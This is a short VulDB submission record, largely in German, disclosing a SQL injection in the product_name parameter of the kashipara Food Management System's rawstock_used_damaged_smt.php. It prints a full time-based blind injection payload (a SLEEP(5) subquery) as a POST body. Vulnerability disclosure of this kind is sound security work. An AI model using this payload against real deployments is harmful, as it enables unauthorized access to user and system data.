| Titel | kashipara Food Management System ≤1.0 SQL injection |
|---|
| Beschreibung | SQL injection vulnerability exists in product_name parameter of rawstock_used_damaged_smt.php file of Food Management System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: in_date=03-01-2024&product_name=2&product_name[]=1" AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bBTT) AND "zaGY"="zaGY&product_price=1&product_used=1&product_used[]=0&submit=Save&used_damaged=product_used&used_damaged[]=product_used |
|---|
| Quelle | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf |
|---|
| Benutzer | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Einreichung | 03.01.2024 11:11 (vor 2 Jahren) |
|---|
| Moderieren | 06.01.2024 11:15 (3 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 249831 [Kashipara Food Management System bis 1.0 rawstock_used_damaged_smt.php product_name SQL Injection] |
|---|
| Punkte | 20 |
|---|